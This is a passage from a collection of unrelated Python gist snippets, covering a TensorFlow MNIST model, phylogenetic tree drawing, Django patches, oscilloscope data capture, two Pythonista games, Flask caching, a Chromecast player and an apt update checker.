def decorator(*args, **kwargs):
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
return function(args[0])
else:
return lambda wrapee: function(wrapee, *args, **kwargs)
return decorator
@doublewrap
def define_scope(function, scope=None, *args, **kwargs):
"""
A decorator for functions that define TensorFlow operations. The wrapped
function will only be executed once. Subsequent calls to it will directly
return the result so that operations are added to the graph only once.
The operations added by the function live within a tf.variable_scope(). If
this decorator is used with arguments, they will be forwarded to the
variable scope. The scope name defaults to the name of the wrapped
function.
"""
attribute = '_cache_' + function.__name__
name = scope or function.__name__
@property
@functools.wraps(function)
def decorator(self):
if not hasattr(self, attribute):
with tf.variable_scope(name, *args, **kwargs):
setattr(self, attribute, function(self))
return getattr(self, attribute)
return decorator
class Model:
def __init__(self, image, label):
self.image = image
self.label = label
self.prediction
self.optimize
self.error
@define_scope(initializer=tf.contrib.slim.xavier_initializer())
def prediction(self):
x = self.image
x = tf.contrib.slim.fully_connected(x, 200)
x = tf.contrib.slim.fully_connected(x, 200)
x = tf.contrib.slim.fully_connected(x, 10, tf.nn.softmax)
return x
@define_scope
def optimize(self):
logprob = tf.log(self.prediction + 1e-12)
cross_entropy = -tf.reduce_sum(self.label * logprob)
optimizer = tf.train.RMSPropOptimizer(0.03)
return optimizer.minimize(cross_entropy)
@define_scope
def error(self):
mistakes = tf.not_equal(
tf.argmax(self.label, 1), tf.argmax(self.prediction, 1))
return tf.reduce_mean(tf.cast(mistakes, tf.float32))
def main():
mnist = input_data.read_data_sets('./mnist/', one_hot=True)
image = tf.placeholder(tf.float32, [None, 784])
label = tf.placeholder(tf.float32, [None, 10])
model = Model(image, label)
sess = tf.Session()
sess.run(tf.initialize_all_variables())
for _ in range(10):
images, labels = mnist.test.images, mnist.test.labels
error = sess.run(model.error, {image: images, label: labels})
print('Test error {:6.2f}%'.format(100 * error))
for _ in range(60):
images, labels = mnist.train.next_batch(100)
sess.run(model.optimize, {image: images, label: labels})
if __name__ == '__main__':
main()
```
#### File: hard-gists/868b1057d9c0b72a57b809a67ad6e4cc/snippet.py
```python
from collections import defaultdict
from ete3 import PhyloTree, TreeStyle, SeqMotifFace, TextFace, RectFace
alg = """
>Dme_001
MAEIPDETIQQFMALT---HNIAVQYLSEFGDLNEAL--YYASQTDDIKDRREEAH
>Dme_002
MAEIPDATIQQFMALTNVSHNIAVQY--EFGDLNEALNSYYAYQTDDQKDRREEAH
>Cfa_001
MAEIPDATIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
>Mms_001
MAEAPDETIQQFMALTNVSHNIAVQYLSEFGDLNEAL--------------REEAH
>Hsa_001
MAEIPDETIQQFMALT---HNIAVQYLSEFGDLNEALNSYYASQTDDIKDRREEAH
>Ptr_002
MAEIPDATIQ-FMALTNVSHNIAVQY--EFGDLNEALNSY--YQTDDQKDRREEAH
>Mmu_002
MAEIPDATIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
>Hsa_002
MAEAPDETIQQFM-LTNVSHNIAVQYLSEFGDLNEAL--------------REEAH
>Ptr_001
MAEIPDATIQ-FMALTNVSHNIAVQY--EFGDLNEALNSY--YQTDDQKDRREEAH
>Mmu_001
MAEIPDTTIQ---ALTNVSHNIAVQYLSEFGDLNEALNSYYASQTDDQPDRREEAH
"""
def mutation_columns(sequences):
col2diffs = defaultdict(set)
alg_length = len(sequences[0])
for col in xrange(alg_length):
for seq in sequences:
col2diffs[col].add(seq[col])
col2diffs[col].discard('-')
subseqs = set()
relevant_columns = []
for col in xrange(alg_length):
if len(col2diffs[col]) > 1:
relevant_columns.append(col)
for seq in sequences:
subseqs.add(''.join([seq[col] for col in relevant_columns]))
return subseqs, relevant_columns
def get_example_tree():
# Performs a tree reconciliation analysis
gene_tree_nw = '((Dme_001,Dme_002),(((Cfa_001,Mms_001),((Hsa_001,Ptr_001),Mmu_001)),(Ptr_002,(Hsa_002,Mmu_002))));'
t = PhyloTree(gene_tree_nw)
ts = TreeStyle()
# disable default PhyloTree Layout
ts.layout_fn = lambda x: True
t.link_to_alignment(alg)
node2content = t.get_cached_content()
for node in t.traverse():
node.img_style["size"] = 0
if not node.is_leaf():
leaves = node2content[node]
# get columns with different aa
subseqs, relevant_columns = mutation_columns([lf.sequence for lf in leaves])
for seq in subseqs:
f = SeqMotifFace(seq, seq_format="seq", width=10, height=8)
f.margin_top = 2
f.margin_right = 6
node.add_face(f, column=0, position="branch-bottom")
for j, col in enumerate(relevant_columns):
col_f = RectFace(10, 10, fgcolor=None, bgcolor=None,
label={"text":str(col), "fonttype":"Courier", "color":"black", "fontsize":6})
node.add_face(col_f, column=j, position="branch-top")
col_f.margin_bottom = 2
else:
f = SeqMotifFace(node.sequence, seq_format="seq", width=6)
node.add_face(f, column=0, position="aligned")
alg_length = len(lf.sequence)
ts.draw_aligned_faces_as_table = False
for colnum in xrange(alg_length):
col_f = RectFace(10, 10, fgcolor=None, bgcolor=None,
label={"text":str(colnum), "fonttype":"Courier", "color":"black", "fontsize":6})
ts.aligned_header.add_face(col_f, column=colnum)
return t, ts
if __name__ == "__main__":
t, ts = get_example_tree()
t.show(tree_style=ts)
```
#### File: hard-gists/872145/snippet.py
```python
from django.conf import settings
from django.db.models import Model, Manager
MUTATING_QUERYSETS = getattr(settings, 'MUTATING_QUERYSETS', False)
class QuerySetMixin(object):
def __init__(self, *args, **kwargs):
self._no_monkey.__init__(self, *args, **kwargs)
self._inplace = MUTATING_QUERYSETS
def inplace(self):
self._inplace = True
return self
def _clone(self, klass=None, setup=False, **kwargs):
if self._inplace and klass is None:
self.__dict__.update(kwargs)
return self
else:
return self._no_monkey._clone(self, klass, setup, **kwargs)
class ManagerMixin(object):
def inplace(self):
return self.get_query_set().inplace()
from inspect import getmembers, ismethod
class MonkeyProxy(object):
def __init__(self, cls):
monkey_bases = tuple(b._no_monkey for b in cls.__bases__ if hasattr(b, '_no_monkey'))
for monkey_base in monkey_bases:
for name, value in monkey_base.__dict__.iteritems():
setattr(self, name, value)
def monkey_mix(cls, mixin, methods=None):
"""
Mixs in a class to other existing class using monkey patches.
Mixin method can call overwritten ones using special proxy object stored in _no_monkey attribute.
class SomeMixin(object):
def do_smth(self, arg):
... do smth else before
self._no_monkey.do_smth(self, arg)
... do smth else after
"""
assert '_no_monkey' not in cls.__dict__, 'Multiple monkey mix not supported'
cls._no_monkey = MonkeyProxy(cls)
if methods is None:
methods = getmembers(mixin, ismethod)
else:
methods = [(m, getattr(mixin, m)) for m in methods]
for name, method in methods:
if hasattr(cls, name):
setattr(cls._no_monkey, name, getattr(cls, name))
setattr(cls, name, method.im_func)
monkey_mix(Manager, ManagerMixin)
monkey_mix(QuerySet, QuerySetMixin)
```
#### File: hard-gists/880901/snippet.py
```python
from django.db.models.signals import post_syncdb
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import Permission
def add_view_permissions(sender, **kwargs):
"""
This syncdb hooks takes care of adding a view permission too all our
content types.
"""
# for each of our content types
for content_type in ContentType.objects.all():
# build our permission slug
codename = "view_%s" % content_type.model
# if it doesn't exist..
if not Permission.objects.filter(content_type=content_type, codename=codename):
# add it
Permission.objects.create(content_type=content_type,
codename=codename,
name="Can view %s" % content_type.name)
print "Added view permission for %s" % content_type.name
# check for all our view permissions after a syncdb
post_syncdb.connect(add_view_permissions)
```
#### File: hard-gists/8814190/snippet.py
```python
import visa
import os, serial
import numpy as np
import pylab as plt
import time
class Scope:
def __init__(self,address,timeOut=40,chunkSize=1024000):
self.device = visa.instrument(address,timeout=timeOut,chunk_size=chunkSize)
self.id = self.device.ask("*idn?")
self.device.write(":key:lock disable") # Allows the panel keys on the scope to be used
self.device.write(":acquire:type normal")
self.device.write(":acquire:memdepth long")
self.device.write(":acquire:mode EQUAL_TIME")
#self.device.write(":acquire:averages 16\n")
def fastGet(self,channelNumber=1,verbose=False):
voltscale = self.device.ask_for_values(":CHAN"+`channelNumber`+":SCAL?")[0]
voltoffset = self.device.ask_for_values(":CHAN"+`channelNumber`+":OFFS?")[0]
if verbose:
print "Voltage scale = ", voltscale, "Voltage offset = ", voltoffset
samplingrate = self.device.ask_for_values(':ACQ:SAMP? CHANNEL'+`channelNumber`)[0]
timePerDiv = self.device.ask_for_values(':TIM:SCAL? CHANNEL'+`channelNumber`)[0]
rawdata = self.device.ask(":WAV:DATA? CHAN"+`channelNumber`)[10:]
data_size = len(rawdata)
if verbose: print 'Data size = ', data_size, "Sample rate = ", samplingrate
data = np.frombuffer(rawdata, 'B')
V = (240-data) * voltscale/25. - (voltoffset + voltscale*4.6)
dt = timePerDiv/50.
t = np.arange(0,len(V)*dt,dt)
np.arange(len(data)) * 1./samplingrate
if verbose: print data
return t, V
def getWaveform(self,channelNumber=1,verbose=True):
"""Acquire 1 M samples from channel"""
# Flush buffer
self.device.write(":ACQ:MEMD LONG")
self.device.write(":STOP")
self.device.write(":RUN")
time.sleep(5)
self.device.write(":STOP")
time.sleep(2)
self.device.write(":STOP")
self.device.write(":WAVEFORM:POINTS:MODE RAW")
voltscale = self.device.ask_for_values(":CHAN"+`channelNumber`+":SCAL?")[0]
voltoffset = self.device.ask_for_values(":CHAN"+`channelNumber`+":OFFS?")[0]
if verbose:
print "Voltage scale = ", voltscale, "Voltage offset = ", voltoffset
samplingrate = self.device.ask_for_values(':ACQ:SAMP? CHANNEL'+`channelNumber`)[0]
rawdata = self.device.ask(":WAV:DATA? CHAN"+`channelNumber`)[10:]
data_size = len(rawdata)
if verbose:
print 'Data size = ', data_size, "Sample rate = ", samplingrate
data = np.frombuffer(rawdata, 'B')
V = (240-data) * voltscale/25 - (voltoffset + voltscale*4.6)
t = np.arange(len(data)) * 1./samplingrate
if verbose: print data
return t, V
def recordAverages(self):
"""Log the average voltages"""
V1,V2 = np.array([]), np.array([])
V = np.array([])
t = np.array([])
t0 = time.time()
ti = time.time()
tAcq = 2*3600 # seconds
while ti < (t0 + tAcq):
try:
self.device.write(":MEASURE:VAVERAGE? CH1")
dataString = self.device.read()
ti = time.time()
Vi = float(dataString[:-1])
time.sleep(1)
except KeyboardInterrupt:
print "Acquisition stopped."
break
print ti,Vi
V = np.concatenate( (V,[Vi]) )
t = np.concatenate( (t,[ti]) )
if len(t)%100 == 0: I = V/1e6
DataOut = np.column_stack( (t,I) )
fileName = date.today().strftime("%y%m%d")+"-beamCurrent"+".log"
np.savetxt(fileName,DataOut)
def close(self):
self.device.write("KEY:FORCE")
self.device.close()
```
#### File: hard-gists/8832970/snippet.py
```python
from scene import *
from PIL import Image, ImageDraw
import random
class Cell (object):
def __init__(self, x, y, frame):
self.frame = frame
self.pos = (x, y)
self.alive = 0
self.neighbors = []
self.background = Color(0,0,0)
def update(self, b=None):
if b is not None:
self.alive = b
self.background = Color(1,1,1) if self.alive else Color(0,0,0)
def living_neighbors(self):
return [c for c in self.neighbors if c.alive]
def draw(self):
fill(*self.background)
rect(*self.frame)
class Grid (object):
def __init__(self, w, h):
self.size = Size(w, h)
w, h = (screen.w/w, screen.h/h)
self.cells = {(x, y):Cell(x, y, Rect(x*w, y*h, w, h)) for x in xrange(self.size.w) for y in xrange(self.size.h)}
for c in self.cells.values():
self.adjacent_cells(c)
grid_img = Image.new('RGBA', [int(i) for i in screen.as_tuple()])
grid_draw = ImageDraw.Draw(grid_img)
for x in xrange(self.size.w): grid_draw.line((x*w, 0, x*w, screen.h))
for y in xrange(self.size.h): grid_draw.line((0, y*h, screen.w, y*h))
self.grid_img = load_pil_image(grid_img)
del grid_img, grid_draw
def __iter__(self):
return iter(sorted(self.cells.keys()))
def __getitem__(self, key):
return self.cells[key]
def itervalues(self):
return iter(self.cells.values())
def create_life(self, pos_list=None):
if pos_list is None:
w, h = self.size
for i in xrange(int((w*h)**0.5)*2):
self.cells[(random.randint(0,w-1), random.randint(0,h-1))].update(1)
else:
for p in pos_list:
self.cells[p].update(1)
def living_cells(self):
return [c for c in self.cells.values() if c.alive]
def dead_cells(self):
return [c for c in self.cells.values() if not c.alive]
def adjacent_cells(self, cell):
w, h = self.size
cx, cy = cell.pos
for y in (-1,0,1):
for x in (-1,0,1):
nx = cx+x
ny = cy+y
if x == y == 0:
continue
if nx>=0 and nx<w and ny>=0 and ny<h:
cell.neighbors.append(self[(nx, ny)])
def update(self):
kill = []
life = []
for cell in self.dead_cells():
if len(cell.living_neighbors()) == 3:
life.append(cell)
for cell in self.living_cells():
if len(cell.living_neighbors()) < 2:
kill.append(cell)
elif len(cell.living_neighbors()) > 3:
kill.append(cell)
else:
life.append(cell)
for k in kill:
self.cells[k.pos].update(0)
for l in life:
self.cells[l.pos].update(1)
def draw(self):
stroke(1,1,1)
stroke_weight(1)
image(self.grid_img, 0, 0)
class MyScene (Scene):
def setup(self):
global screen
screen = self.size
self.paused = True
self.grid = Grid(50, 35)
for c in self.grid.itervalues():
c.update()
def draw(self):
background(0,0,0)
for c in self.grid.living_cells():
c.draw()
self.grid.draw()
if not self.paused:
if len(self.grid.living_cells()) == 0:
self.paused = True
if self.grid.living_cells() > 0:
self.grid.update()
for touch in self.touches.values():
if len(self.touches) == 1:
for cell in self.grid.itervalues():
if touch.location in cell.frame:
cell.update(1)
def touch_began(self, touch):
if len(self.touches) > 1:
self.paused = True if not self.paused else False
if len(self.touches) == 3:
self.grid.create_life()
run(MyScene())
```
#### File: hard-gists/8949577/snippet.py
```python
from scene import *
from PIL import Image
import sound
import random
GAME_READY = 0
GAME_PLAY = 1
GAME_DYING = 2
GAME_DEAD = 3
FLOOR_IMGS = ['Ear_Of_Rice', 'Herb', 'Snail', 'Spiral_Shell', 'Turtle', 'Anchor', 'Pile_Of_Poo', 'Sailboat', 'Speedboat']
BACK_IMGS = ['Blowfish', 'Dolphin', 'Fish', 'Tropical_Fish', 'Whale']
class GameEnvironment(object):
def __init__(self, x, y, w, h):
self.playfield = Rect(x, y, w, h)
self.gravity = int(h *-3.000) # 3000
self.scroll = int(h * 0.300) # 300
self.float_max = int(h * 0.300) # 300
self.float_min = int(h * 0.050) # 50
self.jump = int(h * 0.800) # 800
self.gap = int(h * 0.360) # 360
self.ground_height = int(h * 0.100) # 100
self.tower_width = int(h * 0.140) # 140
self.tower_cap = int(h * 0.065) # 65
self.tower_gap = (self.playfield.w - (self.tower_width * 2)) / 2
self.tower_min_height = self.tower_cap
self.tower_max_height = self.playfield.h - self.ground_height - self. tower_cap - self.tower_gap
self.player_width = int(h * 0.080) # 80
self.player_height = int(h * 0.080) # 80
self.player_x = int(h * 0.200) # 200
self.player_y = self.playfield.h / 2 + self.ground_height
self.bubble_min = int(h * 0.002) # 2
self.bubble_max = int(h * 0.020) # 20
self.floor_min = int(h * 0.040) # 40
self.floor_max = int(h * 0.128) # 128
self.back_min = int(h * 0.020) # 20
self.back_max = int(h * 0.040) # 40
self.text_x = w / 2
self.text_1_y = 0.9 * h
self.text_2_y = 0.6 * h
self.text_3_y = 0.4 * h
self.font_size = int(h * 0.064) # 64
self.font = 'AvenirNext-Heavy'
self.score = 0
self.best = 0
self.crash = False
self.gametime = 0
self.deadtime = 0
self.state = GAME_READY
class Bubble(object):
def __init__(self, x, y, w, h, float):
self.bounds = Rect(x, y, w, h)
self.float = float
self.alpha = random.random()
self.img = 'White_Circle'
def draw(self):
tint(1, 1, 1, self.alpha)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Player(object):
def __init__(self, x, y, w, h):
self.bounds = Rect(x, y, w, h)
img = Image.open('Octopus').transpose(Image.FLIP_LEFT_RIGHT)
self.img = load_pil_image(img)
self.velocity = 0
self.jumped = False
def draw(self):
tint(1.00, 1.00, 1.00)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class FloorSprite(object):
def __init__(self, env):
self.env = env
self.set_random_bounds()
self.set_random_image()
def set_random_image(self):
img = Image.open(FLOOR_IMGS[random.randint(0, len(FLOOR_IMGS) - 1)])
if(random.random > 0.5):
img = img.transpose(Image.FLIP_LEFT_RIGHT)
self.img = load_pil_image(img)
def set_random_bounds(self):
env = self.env
size = random.randint(env.floor_min, env.floor_max)
y = random.randint(env.playfield.bottom(), env.ground_height)
x = random.randint(env.playfield.left(), env.playfield.right() + env.playfield.w)
self.bounds = Rect(x, y, size, size)
def draw(self):
tint(1,1,1)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class BackgroundSprite(object):
def __init__(self, env):
self.env = env
self.velocity = env.scroll / 4
self.set_random_bounds()
self.set_random_image()
def set_random_image(self):
img = Image.open(BACK_IMGS[random.randint(0, len(BACK_IMGS) - 1)])
self.velocity = random.randint(self.env.scroll / 4, self.env.scroll / 2)
if(random.random() > 0.5):
img = img.transpose(Image.FLIP_LEFT_RIGHT)
self.velocity *= -1
self.img = load_pil_image(img)
def set_random_bounds(self):
env = self.env
size = random.randint(env.back_min, env.back_max)
y = random.randint(env.ground_height, env.playfield.top() - size)
if self.velocity < 0:
x = env.playfield.left()
else:
x = env.playfield.right()
self.bounds = Rect(x, y, size, size)
def draw(self):
tint(1,1,1)
image(self.img, self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Ground(object):
def __init__(self, x, y, w, h):
self.bounds = Rect(x, y, w, h)
def draw(self):
stroke_weight(4)
stroke(0.00, 0.00, 0.00)
fill(0.50, 0.25, 0.00)
rect(self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
class Tower(object):
def __init__(self, x, env):
self.x = x
self.env = env
self.create_towers_and_caps()
def set_x(self, x):
self.x = x
self.lower_tower.x = x + 6
self.lower_cap.x = x
self.upper_tower.x = x + 6
self.upper_cap.x = x
def right(self):
return self.lower_tower.right()
def left(self):
return self.lower_tower.left()
def create_towers_and_caps(self):
self.passed = False
height = random.randint(self.env.tower_min_height, self.env.tower_max_height)
self.lower_tower = Rect(self.x + 6, self.env.ground_height, self.env.tower_width - 12, height)
self.lower_cap = Rect(self.x, self.env.ground_height + height - self.env.tower_cap, self.env.tower_width, self.env.tower_cap)
self.upper_tower = Rect(self.x + 6, height + self.env.gap, self.env.tower_width - 12, self.env.playfield.h - height + self.env.gap)
self.upper_cap = Rect(self.x, height + self.env.gap, self.env.tower_width, self.env.tower_cap)
def intersects(self, r):
return self.lower_tower.intersects(r) or self.upper_tower.intersects(r)
def draw(self):
stroke_weight(4)
stroke(0.00, 0.50, 0.25)
stroke(0.20, 0.20, 0.00)
fill(0.00, 1.00, 0.00)
fill(0.50, 0.50, 0.00)
rect(self.lower_tower.x, self.lower_tower.y, self.lower_tower.w, self.lower_tower.h)
rect(self.lower_cap.x, self.lower_cap.y, self.lower_cap.w, self.lower_cap.h)
rect(self.upper_tower.x, self.upper_tower.y, self.upper_tower.w, self.upper_tower.h)
rect(self.upper_cap.x, self.upper_cap.y, self.upper_cap.w, self.upper_cap.h)
class Game(object):
def __init__(self, x, y, w, h):
self.env = GameEnvironment(x, y, w, h)
self.game_setup()
def game_setup(self):
self.env.score = 0
self.env.crash = False
self.env.state = GAME_READY
self.create_game_objects()
def create_game_objects(self):
self.player = Player(self.env.player_x, self.env.player_y, self.env.player_width, self.env.player_height)
self.ground = Ground(self.env.playfield.x, self.env.playfield.y, self.env.playfield.w, self.env.ground_height)
self.towers = []
x = self.env.playfield.w * 2
for t in range(3):
self.towers.append(Tower(x, self.env))
x += self.env.tower_width + self.env.tower_gap
self.bubbles = []
for t in range(10):
d = random.randint(0, 20)
self.bubbles.append(Bubble(random.randint(0, self.env.playfield.w), random.randint(0, self.env.playfield.h), d, d,random.randint(self.env.float_min, self.env.float_max)))
self.floor_sprites = []
for t in range(1):
self.floor_sprites.append(FloorSprite(self.env))
self.background_sprites = []
for t in range(2):
self.background_sprites.append(BackgroundSprite(self.env))
def move_player(self, dt):
if(self.env.state == GAME_DEAD):
return
elif((self.env.state == GAME_READY) and (self.player.bounds.y < (self.env.playfield.h / 2)) or self.player.jumped):
self.player.jumped = False
self.player.velocity = self.env.jump
else:
self.player.velocity = self.player.velocity + self.env.gravity * dt
self.player.bounds.y += self.player.velocity * dt
def move_towers(self, dt):
if(self.env.state == GAME_PLAY):
move = self.env.scroll * dt
for tower in self.towers:
tower.set_x(tower.x - move)
if tower.right() < self.env.playfield.x:
tower.set_x(self.env.playfield.w + self.env.tower_gap)
tower.create_towers_and_caps()
def move_bubbles(self, dt):
if(self.env.state == GAME_DEAD):
return
for bubble in self.bubbles:
if (bubble.bounds.bottom() > self.env.playfield.top()) or (bubble.bounds.left() < self.env.playfield.left()):
x = random.randint(self.env.playfield.left(), self.env.playfield.right() + self.env.playfield.w)
y = self.env.playfield.bottom() - random.randint(0, self.env.bubble_max)
d = random.randint(self.env.bubble_min, self.env.bubble_max)
bubble.bounds = Rect(x, y, d, d)
bubble.float = random.randint(self.env.float_min, self.env.float_max)
bubble.bounds.y += bubble.float * dt
if(self.env.state <> GAME_DYING):
bubble.bounds.x -= self.env.scroll * dt
def move_floor_sprites(self, dt):
if(self.env.state == GAME_READY) or (self.env.state == GAME_PLAY):
move = self.env.scroll * dt
for sprite in self.floor_sprites:
sprite.bounds.x -= move
if sprite.bounds.right() < self.env.playfield.left():
sprite.set_random_image()
sprite.set_random_bounds()
sprite.bounds.x = random.randint(self.env.playfield.right(), self.env.playfield.right() + self.env.playfield.w)
def move_background_sprites(self, dt):
if(self.env.state == GAME_READY) or (self.env.state == GAME_PLAY):
for sprite in self.background_sprites:
move = sprite.velocity * dt
sprite.bounds.x -= move
if(sprite.bounds.right() < self.env.playfield.left()) or (sprite.bounds.left() > self.env.playfield.right()):
sprite.set_random_image()
sprite.set_random_bounds()
def update_score(self):
if(self.env.state == GAME_PLAY):
for tower in self.towers:
if tower.passed == False:
if tower.left() < self.player.bounds.right():
tower.passed = True
self.env.score += 1
sound.play_effect('Coin_1')
def player_dead(self):
self.env.state = GAME_DEAD
self.env.dead_time = self.env.game_time
if self.env.score > self.env.best:
self.env.best = self.env.score
def collision_detect(self):
if(self.env.state == GAME_PLAY):
if self.player.bounds.bottom() < self.ground.bounds.top():
sound.play_effect('Crashing')
self.env.crash = True
self.player_dead()
elif(self.env.state == GAME_DYING):
if self.player.bounds.bottom() < self.ground.bounds.top():
self.player_dead()
if self.env.state == GAME_PLAY:
if self.player.bounds.bottom() > self.env.playfield.top():
self.env.crash = True
self.env.state = GAME_DYING
else:
for tower in self.towers:
if tower.intersects(self.player.bounds):
sound.play_effect('Crashing')
self.env.crash = True
self.env.state = GAME_DYING
def text_shadow(self, s, y):
tint(0, 0, 0)
text(s, self.env.font, self.env.font_size, self.env.text_x + 4, y - 4)
tint(1, 1, 1)
text(s, self.env.font, self.env.font_size, self.env.text_x, y)
def draw(self):
if(self.env.crash):
background(1, 1, 1)
self.env.crash = False
else:
background(0.00, 0.50, 0.50)
for bubble in self.bubbles:
bubble.draw()
for sprite in self.background_sprites:
sprite.draw()
self.ground.draw()
for tower in self.towers:
tower.draw()
self.player.draw()
for sprite in self.floor_sprites:
sprite.draw()
tint(0, 0, 0)
if(self.env.state == GAME_READY):
self.text_shadow("Tap to Start!", self.env.text_2_y)
elif((self.env.state == GAME_PLAY) or (self.env.state == GAME_DYING) or (self.env.state == GAME_READY)):
self.text_shadow(str(int(self.env.score)), self.env.text_1_y)
elif(self.env.state == GAME_DEAD):
self.text_shadow("Score : " + str(int(self.env.score)), self.env.text_2_y)
self.text_shadow("Best : " + str(int(self.env.best)), self.env.text_3_y)
def loop(self, dt, t):
self.env.game_time = t
self.move_player(dt)
self.move_towers(dt)
self.move_bubbles(dt)
self.move_floor_sprites(dt)
self.move_background_sprites(dt)
self.update_score()
self.collision_detect()
self.draw()
def screen_tapped(self):
if(self.env.state == GAME_READY):
self.env.state = GAME_PLAY
if(self.env.state == GAME_PLAY):
self.player.jumped = True
sound.play_effect('Boing_1')
elif(self.env.state == GAME_DEAD):
if(self.env.dead_time + 0.5 < self.env.game_time):
self.game_setup()
class MyScene (Scene):
def setup(self):
self.game = Game(self.bounds.x, self.bounds.y, self.bounds.w, self.bounds.h)
def draw(self):
self.game.loop(self.dt, self.t)
def touch_began(self, touch):
self.game.screen_tapped()
run(MyScene(), PORTRAIT)
```
#### File: hard-gists/8951985/snippet.py
```python
import logging
import pylibmc
from werkzeug.contrib.cache import MemcachedCache
from flask import request
from flask.ext.cache import Cache
log = logging.getLogger(__name__)
mc = MemcachedCache()
class GrovemadeCache(Cache):
'''
Grovemade specific caching
'''
def get_generation(self):
'''
Incremenent generation to invalidate all keys.
'''
return mc.get('GENERATION-KEY')
def inc_generation(self):
try:
mc.inc('GENERATION-KEY')
except pylibmc.NotFound:
mc.set('GENERATION-KEY', '1') # memcached increments string integers
def get_group_key(self, group):
return u'GROUP-KEY:%s' % group
def get_groups_key(self, groups):
'''
Get a generation key for a list of groups
'''
# groups_key = u''
key_values = []
for group in groups:
group_key = self.get_group_key(group)
group_version = mc.get(group_key)
if group_version is None:
group_version = '1'
mc.set(group_key, group_version)
key_values.append(group_version)
groups_key = u':'.join(key_values)
return groups_key
def inc_group(self, group):
'''
Increment group. Call to invalidate cache for entire group.
'''
try:
mc.inc(self.get_group_key(group))
except pylibmc.NotFound:
mc.set(self.get_group_key(group), '1') # memcached increments string integers
def build_group_key_prefix(self, groups=None):
'''
Generational caching strategy.
Generation is global to all groups
Groups are local to arbitrary groupings, such as "product" and "collection"
All may be expired at will.
'''
if groups is None:
groups = []
return u'{generation}:{groups}'.format(
groups=self.get_groups_key(groups),
generation=self.get_generation(),
)
# def cached(self, timeout=None, key_prefix='view/%s', unless=None):
def cached_generational(self, timeout=None, groups=None, key_prefix='view/%s', unless=None):
'''
Build generational cache key. Always vary on PJAX.
'''
def build_key():
if callable(key_prefix):
cache_key = key_prefix()
elif '%s' in key_prefix:
cache_key = key_prefix % request.path
else:
cache_key = key_prefix
key = cache_key + self.build_group_key_prefix(groups) + request.headers.get('X-PJAX', '')
return key
# log.debug(u"Built group key: %s" % key)
return self.cached(timeout=timeout, key_prefix=build_key, unless=None)
```
#### File: hard-gists/8b100c205b8c35b3c8ce/snippet.py
```python
import pychromecast
import argparse
def play_video(url, cast):
if cast.media_controller.status.player_state == "PAUSED" or cast.media_controller.status.content_id == url:
cast.media_controller.play()
else:
cast.play_media((url), "video/mp4")
def pause_video(cast):
if cast.media_controller.status.supports_pause:
cast.media_controller.pause()
else:
print "Cannot pause"
def stop_video(cast):
cast.quit_app()
def main():
casts = pychromecast.get_chromecasts_as_dict()
parser = argparse.ArgumentParser()
parser.add_argument("url", nargs="?", help="URL of media to play. Doesn't support local addresses yet.")
# parser.add_argument("-p", "--pause", help="Pause playback", action='store_true')
parser.add_argument("-s", "--stop", help="Stop playback", action='store_true')
parser.add_argument("-d", "--device", help="Select device. List devices with -D")
parser.add_argument("-D", "--devices", help="List devices", action='store_true')
args = parser.parse_args()
if args.devices:
print ", ".join(casts.keys())
return
if args.device:
cast = casts[args.device]
else:
cast = casts[casts.keys()[0]]
if not args.stop:
play_video(args.url, cast)
return
# elif args.pause:
# pause_video(cast)
# return
elif args.stop:
stop_video(cast)
return
if __name__ == "__main__":
main()
```
#### File: hard-gists/8b1502a49d8b20a6ae70/snippet.py
```python
import apt
import apt_pkg
from time import strftime
import os
import subprocess
import sys
"""
Following functions are used to return package info of available updates.
See: /usr/lib/update-notifier/apt_check.py
"""
SYNAPTIC_PINFILE = "/var/lib/synaptic/preferences"
DISTRO = subprocess.check_output(["lsb_release", "-c", "-s"],
universal_newlines=True).strip()
def clean(cache,depcache):
""" unmark (clean) all changes from the given depcache """
# mvo: looping is too inefficient with the new auto-mark code
# for pkg in cache.Packages:
# depcache.MarkKeep(pkg)
depcache.init()
def saveDistUpgrade(cache,depcache):
""" this functions mimics a upgrade but will never remove anything """
depcache.upgrade(True)
if depcache.del_count > 0:
clean(cache,depcache)
depcache.upgrade()
def get_update_packages():
"""
Return a list of dict about package updates
"""
pkgs = []
apt_pkg.init()
# force apt to build its caches in memory for now to make sure
# that there is no race when the pkgcache file gets re-generated
apt_pkg.config.set("Dir::Cache::pkgcache","")
try:
cache = apt_pkg.Cache(apt.progress.base.OpProgress())
except SystemError as e:
sys.stderr.write("Error: Opening the cache (%s)" % e)
sys.exit(-1)
depcache = apt_pkg.DepCache(cache)
# read the pin files
depcache.read_pinfile()
# read the synaptic pins too
if os.path.exists(SYNAPTIC_PINFILE):
depcache.read_pinfile(SYNAPTIC_PINFILE)
# init the depcache
depcache.init()
try:
saveDistUpgrade(cache,depcache)
except SystemError as e:
sys.stderr.write("Error: Marking the upgrade (%s)" % e)
sys.exit(-1)
# use assignment here since apt.Cache() doesn't provide a __exit__ method
# on Ubuntu 12.04 it looks like
# aptcache = apt.Cache()
for pkg in cache.packages:
if not (depcache.marked_install(pkg) or depcache.marked_upgrade(pkg)):
continue
inst_ver = pkg.current_ver
cand_ver = depcache.get_candidate_ver(pkg)
if cand_ver == inst_ver:
continue
record = {"name": pkg.name,
"security": isSecurityUpgrade(pkg, depcache),
"section": pkg.section,
"current_version": inst_ver.ver_str if inst_ver else '-',
"candidate_version": cand_ver.ver_str if cand_ver else '-',
"priority": cand_ver.priority_str}
pkgs.append(record)
return pkgs
def isSecurityUpgrade(pkg, depcache):
def isSecurityUpgrade_helper(ver):
""" check if the given version is a security update (or masks one) """
security_pockets = [("Ubuntu", "%s-security" % DISTRO),
("gNewSense", "%s-security" % DISTRO),
("Debian", "%s-updates" % DISTRO)]
for (file, index) in ver.file_list:
for origin, archive in security_pockets:
if (file.archive == archive and file.origin == origin):
return True
return False
inst_ver = pkg.current_ver
cand_ver = depcache.get_candidate_ver(pkg)
if isSecurityUpgrade_helper(cand_ver):
return True
# now check for security updates that are masked by a
# canidate version from another repo (-proposed or -updates)
for ver in pkg.version_list:
if (inst_ver and
